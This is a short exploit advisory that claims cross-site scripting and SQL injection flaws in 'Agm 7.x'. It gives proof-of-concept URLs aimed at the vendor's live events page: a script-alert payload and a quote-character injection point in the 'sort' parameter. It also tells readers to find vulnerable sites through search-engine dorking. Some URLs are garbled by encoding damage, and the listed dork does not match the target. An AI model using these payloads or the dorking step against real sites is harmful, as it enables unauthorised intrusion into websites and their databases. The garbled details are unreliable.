====================================================================================================================================
| # Title : Agm 7.x Xss sql injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://www.agm.net/ |
| # Dork : http://emojilo.com/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : <script>alert(/indoushka/);</script>
https://www.agm.net/events?expoend=0&expostart=0&favorites=0&keywords=&order=Wilaya®ions=all§ors=all&sort=%3Cscript%3Ealert(/indoushka/);%3C/script%3E
& sql injection :
https://www.agm.net//events?expoend=0&expostart=0&favorites=0&keywords=&order=Wilaya®ions=all§ors=all&sort=1%27 <==== inject here
https://www.youtube.com/watch?v=fZl-YYvhXE4&lc
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================